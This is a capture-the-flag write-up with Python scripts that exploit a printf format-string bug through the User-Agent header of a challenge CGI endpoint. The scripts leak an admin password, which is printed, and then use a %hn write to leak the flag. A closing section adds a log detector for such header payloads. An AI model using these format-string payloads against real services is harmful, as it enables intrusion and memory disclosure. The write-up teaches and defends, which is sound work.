First use the printf format string to leak the AdminPass, then use a printf `%hn` write to overwrite "br" with "fl" and leak the flag.
Leak AdminPass:
```
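import pwn
import time
import warnings
import requests

# Walk the positional arguments: after 1008 bytes of padding, %<i>$s prints
# the string that the i-th printf argument points to.
for i in range(320, 5000):
    try:
        r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1", "User-Agent": "A"*1008 + f"%{i}$s"}, timeout=5)
        # Assumed delimiter: keep the echoed text up to the next HTML tag.
        d = r.text.split("User Agent : </h3>")[1].split("<")[0]
        # d = bytes.fromhex(d[2:])[::-1]
        print(i, d)
    except (requests.RequestException, IndexError):
        # Request failed or the response has no User Agent block; try the next index.
        pass
# AdminPass=xbYP3h7Ua94c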
```
Leak Flag:
```
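import pwn
import time
import warnings
import requests

# %27750x sets the printed count to 27750 = 0x6c66 (the bytes "fl" in
# little-endian order), %267$hn stores that count as a 16-bit value, and
# %267$s then prints the string at the same argument.
r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1", "X-PASSWORD": "xbYP3h7Ua94c", "User-Agent": "A"*1008 + '%27750x' + "%267$hn" + "%267$s"}, timeout=5)
# Assumed delimiter: keep the echoed text up to the next HTML tag.
d = r.text.split("User Agent : </h3>")[1].split("<")[0]
print(d)
print(r.text)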
```
A full walkthrough can be found in the video:
https://youtu.be/g0mVAbZUXqM?t=1139
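
From the defender's side, the three header shapes used above (positional `%N$s` reads, the `%hn` write and the `%27750x` width) are easy to flag in request logs. The following is an added example, not part of the original writeup or the challenge; `classify_header`, `flag_requests`, the 1024 width threshold and the sample requests are constructed for illustration.

```python
import re

# printf conversion: %[pos$][flags][width][.prec][length]conv, or a literal %%
SPEC = re.compile(
    r"%(?:%|(?P<pos>\d+\$)?[-+ #0']*(?P<width>\d+|\*)?(?:\.\d+)?"
    r"(?:hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfgGaAcspn]))"
)

def classify_header(value, max_width=1024):
    """Return the sorted format-string indicators found in one header value."""
    findings = set()
    for m in SPEC.finditer(value):
        if m.group("conv") is None:        # literal "%%", not a conversion
            continue
        if m.group("conv") == "n":         # %n / %hn / %hhn store to memory
            findings.add("write-specifier")
        if m.group("pos"):                 # %267$s style direct argument access
            findings.add("positional-argument")
        width = m.group("width")
        if width and width.isdigit() and int(width) > max_width:
            findings.add("oversized-width")  # e.g. %27750x inflates the count
    return sorted(findings)

def flag_requests(requests_log):
    """Return (request index, header name, findings) for each suspicious header."""
    hits = []
    for idx, headers in enumerate(requests_log):
        for name, value in headers.items():
            findings = classify_header(value)
            if findings:
                hits.append((idx, name, findings))
    return hits

# Constructed sample requests mirroring the header shapes in this writeup.
SAMPLE = [
    {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"},
    {"X-DEBUG": "1", "User-Agent": "A" * 1008 + "%320$s"},
    {"X-DEBUG": "1", "User-Agent": "A" * 1008 + "%27750x%267$hn%267$s"},
]

if __name__ == "__main__":
    for idx, name, findings in flag_requests(SAMPLE):
        print(idx, name, findings)
```

The check is a triage heuristic: ordinary text such as `100% natural` also parses as a conversion and will be flagged.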